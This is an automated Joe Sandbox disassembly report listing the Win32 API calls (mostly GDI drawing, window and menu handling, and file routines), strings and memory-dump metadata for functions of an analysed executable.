Part of subcall function 004232C4: SetDIBColorTable.GDI32(?,00000000,00000002,?), ref: 0042374A
Part of subcall function 004232C4: PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062,00000000,00423890,?,00000000,004238B2,?,00000000,004238C3,?,?), ref: 0042376C
Part of subcall function 004232C4: CreateCompatibleDC.GDI32(00000028), ref: 0042377F
Part of subcall function 004232C4: SelectObject.GDI32(?,00000000), ref: 004237A2
Part of subcall function 004232C4: SelectPalette.GDI32(?,00000000,00000000), ref: 004237BE
Part of subcall function 004232C4: RealizePalette.GDI32(?), ref: 004237C9
Part of subcall function 004232C4: SetTextColor.GDI32(?,00000000), ref: 004237E7
Part of subcall function 004232C4: SetBkColor.GDI32(?,00000000), ref: 00423801
Part of subcall function 004232C4: BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423829
Part of subcall function 004232C4: SelectPalette.GDI32(?,00000000,000000FF), ref: 0042383B
Part of subcall function 004232C4: SelectObject.GDI32(?,00000000), ref: 00423845
Part of subcall function 004232C4: DeleteDC.GDI32(?), ref: 00423860
Part of subcall function 004232C4: SelectPalette.GDI32(?,?,000000FF), ref: 0042388A

SelectObject.GDI32(?), ref: 00423A9B
SelectPalette.GDI32(?,?,00000000), ref: 00423AAE
RealizePalette.GDI32(?), ref: 00423AB7
SelectPalette.GDI32(?,?,00000000), ref: 00423AC3
RealizePalette.GDI32(?), ref: 00423ACC
SetBkColor.GDI32(?), ref: 00423AD6
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423AFA
SetBkColor.GDI32(?,00000000), ref: 00423B04
SelectObject.GDI32(?,00000000), ref: 00423B17
DeleteObject.GDI32 ref: 00423B23
SelectObject.GDI32(?,00000000), ref: 00423B54
DeleteDC.GDI32(00000000), ref: 00423B70
ReleaseDC.USER32(00000000,00000000), ref: 00423B81

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00424708, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351

APIs

GetDC.USER32(00000000), ref: 00424972
CreateCompatibleDC.GDI32(00000001), ref: 004249D7
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 004249EC
SelectObject.GDI32(?,00000000), ref: 004249F6
DeleteObject.GDI32(00000000), ref: 00424AA9

Part of subcall function 00420530: CreateCompatibleDC.GDI32(00000000), ref: 00420549
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420552
Part of subcall function 00420530: GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 00420566
Part of subcall function 00420530: SelectObject.GDI32(00000000,00000000), ref: 00420572
Part of subcall function 00420530: DeleteDC.GDI32(00000000), ref: 00420578
Part of subcall function 00420530: CreatePalette.GDI32 ref: 004205BE

SelectPalette.GDI32(?,?,00000000), ref: 00424A26
RealizePalette.GDI32(?), ref: 00424A32
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00424A56
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00424AAF,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00424A64
SelectPalette.GDI32(?,00000000,000000FF), ref: 00424A96
SelectObject.GDI32(?,?), ref: 00424AA3
CreateDIBSection.GDI32(00000001,?,00000000,00000000,00000000,00000000), ref: 00424AF4
GetLastError.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,00424B73,?,00000000,?,00000000,00424C25,?,?), ref: 00424B08

Part of subcall function 0040B04C: GetLastError.KERNEL32(00000000,0040B0DC), ref: 0040B066

ReleaseDC.USER32(00000000,00000001), ref: 00424B6D

Strings

(, xrefs: 004248C1
BM, xrefs: 0042482C

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00458D4C, Relevance: 23.0, APIs: 15, Instructions: 468

APIs

Part of subcall function 00423928: GetObjectA.GDI32(?,00000004), ref: 00423941
Part of subcall function 00423928: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042396D
Part of subcall function 00423928: CreatePalette.GDI32(?), ref: 00423977

Part of subcall function 0041F4D8: StretchBlt.GDI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 0041F542

SetTextColor.GDI32(00000000,00000000), ref: 0045900C
SetBkColor.GDI32(00000000,00FFFFFF), ref: 00459017
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 0045903A
SetTextColor.GDI32(00000000,00000000), ref: 0045908F
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0045909A
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 004590BD

Part of subcall function 0041E5DC: GetSysColor.USER32(?), ref: 0041E5E6

SetTextColor.GDI32(00000000,00000000), ref: 0045911A
SetBkColor.GDI32(00000000,00FFFFFF), ref: 00459125
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 00459148

Part of subcall function 0041F654: FillRect.USER32(?,00000000,00000000), ref: 0041F67C

SetTextColor.GDI32(00000000,00000000), ref: 00459208
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0045921A
BitBlt.GDI32(00000000,00000001,00000001,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 00459244
SetTextColor.GDI32(00000000,00000000), ref: 00459260
SetBkColor.GDI32(00000000,00FFFFFF), ref: 00459272
BitBlt.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00E20746), ref: 0045929C

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00423E90, Relevance: 21.2, APIs: 14, Instructions: 217

APIs

Part of subcall function 00424420: GetDC.USER32(00000000), ref: 00424476
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
Part of subcall function 00424420: CreateHalftonePalette.GDI32(00000000), ref: 004244B9
Part of subcall function 00424420: ReleaseDC.USER32(00000000,00000000), ref: 004244C4

SelectPalette.GDI32(?,?,000000FF), ref: 00423ED2
RealizePalette.GDI32(?), ref: 00423EE1
GetDeviceCaps.GDI32(?,0000000C), ref: 00423EF3
GetDeviceCaps.GDI32(?,0000000E), ref: 00423F02
GetBrushOrgEx.GDI32(?,?), ref: 00423F36
SetStretchBltMode.GDI32(?,00000004), ref: 00423F44
SetBrushOrgEx.GDI32(?,?,?), ref: 00423F5C
SetStretchBltMode.GDI32(00000000,00000003), ref: 00423F79
SelectPalette.GDI32(?,?,000000FF), ref: 004240C7

Part of subcall function 004243C0: DeleteObject.GDI32(?), ref: 004243E3

CreateCompatibleDC.GDI32(00000000), ref: 00423FD9
SelectObject.GDI32(?,?), ref: 00423FEE

Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420027
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 0042003C
Part of subcall function 0041FFE4: MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042008B
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200A5
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 004200B1
Part of subcall function 0041FFE4: CreateCompatibleDC.GDI32(00000000), ref: 004200C5
Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,?,?), ref: 004200E6
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200FB
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,02080848,00000000), ref: 0042010F
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,?,00000000), ref: 00420121
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,000000FF), ref: 00420136
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,02080848,000000FF), ref: 0042014C
Part of subcall function 0041FFE4: RealizePalette.GDI32(?), ref: 00420158
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042017A
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0042019C
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,00000000), ref: 004201A4
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,00FFFFFF), ref: 004201B2
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004201DE
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420203
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,?), ref: 0042020D
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,?), ref: 00420217
Part of subcall function 0041FFE4: SelectObject.GDI32(?,00000000), ref: 0042022A
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 00420233
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,00000000), ref: 00420255
Part of subcall function 0041FFE4: DeleteDC.GDI32(?), ref: 0042025E

SelectObject.GDI32(?,00000000), ref: 0042404D
DeleteDC.GDI32(00000000), ref: 0042405C
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 004240A2

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0041FE50, Relevance: 21.1, APIs: 14, Instructions: 131

APIs

CreateCompatibleDC.GDI32(00000000), ref: 0041FE67
CreateCompatibleDC.GDI32(00000000), ref: 0041FE71
GetObjectA.GDI32(?,00000018,?), ref: 0041FE91
CreateBitmap.GDI32(?,?,00000001,00000001,00000000,00000000,0041FF9E,?,00000000), ref: 0041FEA8
GetDC.USER32(00000000), ref: 0041FEB4
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0041FEE1
ReleaseDC.USER32(00000000,00000000), ref: 0041FF07

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

SelectObject.GDI32(?,?), ref: 0041FF22
SelectObject.GDI32(?,00000000), ref: 0041FF31
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041FF5D
SelectObject.GDI32(?,00000000), ref: 0041FF6B
SelectObject.GDI32(?,00000000), ref: 0041FF79
DeleteDC.GDI32(?), ref: 0041FF8F
DeleteDC.GDI32(?), ref: 0041FF98

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043E4E4, Relevance: 19.7, APIs: 13, Instructions: 213

APIs

GetWindowDC.USER32(00000000), ref: 0043E518
GetClientRect.USER32(00000000,?), ref: 0043E53B
GetWindowRect.USER32(00000000,?), ref: 0043E54D
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0043E563
OffsetRect.USER32(?,?,?), ref: 0043E578
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0043E591
InflateRect.USER32(?,?,?), ref: 0043E5AF
GetWindowLongA.USER32(00000000,000000F0), ref: 0043E605
DrawEdge.USER32(?,?,00000000,00000008), ref: 0043E6D1
IntersectClipRect.GDI32(?,?,?,?,?), ref: 0043E6EA
OffsetRect.USER32(?,?,?), ref: 0043E709

Part of subcall function 0041F29C: CreateBrushIndirect.GDI32(?), ref: 0041F346

FillRect.USER32(?,?,00000000), ref: 0043E725
ReleaseDC.USER32(00000000,?), ref: 0043E744

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00426938, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 00426971
GetSystemMetrics.USER32(00000000), ref: 00426996
GetSystemMetrics.USER32(00000001), ref: 004269A1
GetClipBox.GDI32(?,?), ref: 004269B3
GetDCOrgEx.GDI32(?,?), ref: 004269C0
OffsetRect.USER32(?,?,?), ref: 004269D9
IntersectRect.USER32(?,?,?), ref: 004269EA
IntersectRect.USER32(?,?,?), ref: 00426A00
IntersectRect.USER32(?,?,?), ref: 00426A20

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

EnumDisplayMonitors, xrefs: 00426950

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00423E8E, Relevance: 16.7, APIs: 11, Instructions: 165

APIs

Part of subcall function 00424420: GetDC.USER32(00000000), ref: 00424476
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042448B
Part of subcall function 00424420: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424495
Part of subcall function 00424420: CreateHalftonePalette.GDI32(00000000), ref: 004244B9
Part of subcall function 00424420: ReleaseDC.USER32(00000000,00000000), ref: 004244C4

SelectPalette.GDI32(?,?,000000FF), ref: 00423ED2
RealizePalette.GDI32(?), ref: 00423EE1
GetDeviceCaps.GDI32(?,0000000C), ref: 00423EF3
GetDeviceCaps.GDI32(?,0000000E), ref: 00423F02
GetBrushOrgEx.GDI32(?,?), ref: 00423F36
SetStretchBltMode.GDI32(?,00000004), ref: 00423F44
SetBrushOrgEx.GDI32(?,?,?), ref: 00423F5C
SetStretchBltMode.GDI32(00000000,00000003), ref: 00423F79
SelectPalette.GDI32(?,?,000000FF), ref: 004240C7

Part of subcall function 004243C0: DeleteObject.GDI32(?), ref: 004243E3

CreateCompatibleDC.GDI32(00000000), ref: 00423FD9
SelectObject.GDI32(?,?), ref: 00423FEE

Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420027
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 0042003C
Part of subcall function 0041FFE4: MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042008B
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200A5
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 004200B1
Part of subcall function 0041FFE4: CreateCompatibleDC.GDI32(00000000), ref: 004200C5
Part of subcall function 0041FFE4: CreateCompatibleBitmap.GDI32(?,?,?), ref: 004200E6
Part of subcall function 0041FFE4: SelectObject.GDI32(?,?), ref: 004200FB
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,02080848,00000000), ref: 0042010F
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,?,00000000), ref: 00420121
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,000000FF), ref: 00420136
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,02080848,000000FF), ref: 0042014C
Part of subcall function 0041FFE4: RealizePalette.GDI32(?), ref: 00420158
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042017A
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0042019C
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,00000000), ref: 004201A4
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,00FFFFFF), ref: 004201B2
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004201DE
Part of subcall function 0041FFE4: StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420203
Part of subcall function 0041FFE4: SetTextColor.GDI32(?,?), ref: 0042020D
Part of subcall function 0041FFE4: SetBkColor.GDI32(?,?), ref: 00420217
Part of subcall function 0041FFE4: SelectObject.GDI32(?,00000000), ref: 0042022A
Part of subcall function 0041FFE4: DeleteObject.GDI32(?), ref: 00420233
Part of subcall function 0041FFE4: SelectPalette.GDI32(?,00000000,00000000), ref: 00420255
Part of subcall function 0041FFE4: DeleteDC.GDI32(?), ref: 0042025E

SelectObject.GDI32(?,00000000), ref: 0042404D
DeleteDC.GDI32(00000000), ref: 0042405C
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,?), ref: 004240A2

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043B8BC, Relevance: 16.6, APIs: 11, Instructions: 133

APIs

Part of subcall function 0043B3DC: BeginPaint.USER32(00000000,?), ref: 0043B402
Part of subcall function 0043B3DC: SaveDC.GDI32(?), ref: 0043B436
Part of subcall function 0043B3DC: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0043B498
Part of subcall function 0043B3DC: RestoreDC.GDI32(?,?), ref: 0043B4C2
Part of subcall function 0043B3DC: EndPaint.USER32(00000000,?), ref: 0043B4F6

GetDC.USER32(00000000), ref: 0043B907
CreateCompatibleBitmap.GDI32(00000000,?), ref: 0043B92B
ReleaseDC.USER32(00000000,00000000), ref: 0043B936
CreateCompatibleDC.GDI32(00000000), ref: 0043B93D
SelectObject.GDI32(00000000,?), ref: 0043B94D
BeginPaint.USER32(00000000,?), ref: 0043B96F

Part of subcall function 0043B8BC: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0043B9CB
Part of subcall function 0043B8BC: EndPaint.USER32(00000000,?), ref: 0043B9DC
Part of subcall function 0043B8BC: SelectObject.GDI32(00000000,?), ref: 0043B9F6
Part of subcall function 0043B8BC: DeleteDC.GDI32(00000000), ref: 0043B9FF
Part of subcall function 0043B8BC: DeleteObject.GDI32(?), ref: 0043BA08

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00407134, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 26

APIs

FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 0040714C
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00407158
RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00407167
RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00407173
SendMessageA.USER32(00000000,?,00000000,00000000), ref: 004071AF

Strings

Magellan MSWHEEL, xrefs: 00407142
MSH_SCROLL_LINES_MSG, xrefs: 0040716E
MouseZ, xrefs: 00407147
MSH_WHEELSUPPORT_MSG, xrefs: 00407162
MSWHEEL_ROLLMSG, xrefs: 00407153

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043B538, Relevance: 15.2, APIs: 10, Instructions: 177

APIs

RectVisible.GDI32(?,?), ref: 0043B5F1
SaveDC.GDI32(?), ref: 0043B607

Part of subcall function 004358CC: GetWindowOrgEx.GDI32(?), ref: 004358DA
Part of subcall function 004358CC: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004358F0

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043B62A
RestoreDC.GDI32(?,?), ref: 0043B645

Part of subcall function 0041E5DC: GetSysColor.USER32(?), ref: 0041E5E6

CreateSolidBrush.GDI32(00000000), ref: 0043B6C6
FrameRect.USER32(?,?,?), ref: 0043B6F9
DeleteObject.GDI32(?), ref: 0043B703
CreateSolidBrush.GDI32(00000000), ref: 0043B713
FrameRect.USER32(?,00000000,?), ref: 0043B746
DeleteObject.GDI32(?), ref: 0043B750

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00402A68, Relevance: 15.1, APIs: 10, Instructions: 129

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402AF0
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402B14
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402B30
ReadFile.KERNEL32(?,?,00000080,?,00000000), ref: 00402B51
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402B7A
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402B88
GetStdHandle.KERNEL32(000000F5), ref: 00402BC3
GetFileType.KERNEL32 ref: 00402BD9
CloseHandle.KERNEL32 ref: 00402BF4
GetLastError.KERNEL32(000000F5), ref: 00402C0C

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00452694, Relevance: 15.1, APIs: 10, Instructions: 74

APIs

GetSystemMenu.USER32(00000000,00000000), ref: 004526DF
DeleteMenu.USER32(00000000,0000F130,00000000), ref: 004526FD
DeleteMenu.USER32(00000000,00000007,00000400), ref: 0045270A
DeleteMenu.USER32(00000000,00000005,00000400), ref: 00452717
DeleteMenu.USER32(00000000,0000F030,00000000), ref: 00452724
DeleteMenu.USER32(00000000,0000F020,00000000), ref: 00452731
DeleteMenu.USER32(00000000,0000F000,00000000), ref: 0045273E
DeleteMenu.USER32(00000000,0000F120,00000000), ref: 0045274B
EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 00452769
EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00452785

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0043491C, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 139

APIs

Part of subcall function 00434D54: WindowFromPoint.USER32(=LC,?), ref: 00434D5A
Part of subcall function 00434D54: GetParent.USER32(00000000), ref: 00434D71

GetWindow.USER32(00000000,00000004), ref: 0043493E
GetCurrentThreadId.KERNEL32(004348B0,?,00000000,00000004,?,-0000000C,?), ref: 00434A12
EnumThreadWindows.USER32(00000000,004348B0,?), ref: 00434A18
GetWindowRect.USER32(00000000,?), ref: 00434A2F
IntersectRect.USER32(?,?,?), ref: 00434A9D

Part of subcall function 00433EA4: GlobalFindAtomA.KERNEL32(00000000), ref: 00433EB8
Part of subcall function 00433EA4: GetPropA.USER32(00000000,00000000), ref: 00433ECF

Strings

41C, xrefs: 004349D2
=LC, xrefs: 0043492B, 004349A3, 004349CC, 004349E1, 004349B0
=LC, xrefs: 004349FA, 00434A43, 00434A34, 00434A3B

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

